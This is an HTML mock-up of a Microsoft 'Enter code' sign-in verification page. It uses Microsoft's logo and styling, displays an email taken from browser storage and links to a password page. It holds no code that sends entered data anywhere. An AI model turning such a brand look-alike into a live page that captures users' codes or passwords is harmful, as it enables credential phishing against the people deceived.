<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Email Verification</title>
    <link rel="icon" href="./Images/favicon.svg" type="image/x-icon" />
    <link rel="stylesheet" href="MS.css" />
    <style>
        #message1{
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.6em;
            letter-spacing: 0em;

        }
        #message{
            display: block;
            color: black;
            opacity: 0.9;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
        }
        #email{
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.33em;
            letter-spacing: 0em;

        }
    </style>
  </head>
  <body>
    <div id="sp">
      <img src="./Images/Microsoft_logo.svg" alt="Microsoft image logo" />
      <div id="message1">
        <img src="./Images/arrow_left_1.svg" alt="arrow" id="arrow">
        <span class="mail">
          Email
        </span>
      </div>
      <h1 id="p">Enter code</h1>
      <p id="message">We emailed a code to  <span></span> please enter the code to sign in</p>


      <div>
        <input
          type="Text"
          id="email"
          placeholder="Enter code"
          autofocus
        />
      </div>
      
      <a href="./EmailPassword.html" id="access">Use your password instead</a>
      <div class="btn">
        <a href=""><input type="button" value="Sign in" id="next" /></a>
      </div>
    </div>
    <div>
      <a href="">Terms of use</a>
      <a href="">Privacy & cookies</a>
      <span>...</span>
    </div>

    <script>
      const span = document.querySelectorAll("body #sp span");
      const arrow = document.querySelector("#arrow");
      const userEmail = localStorage.getItem("email");

      span.forEach((m) => m.textContent = userEmail);

      arrow.addEventListener('click',()=>history.back())

    </script>
  </body>
</html>
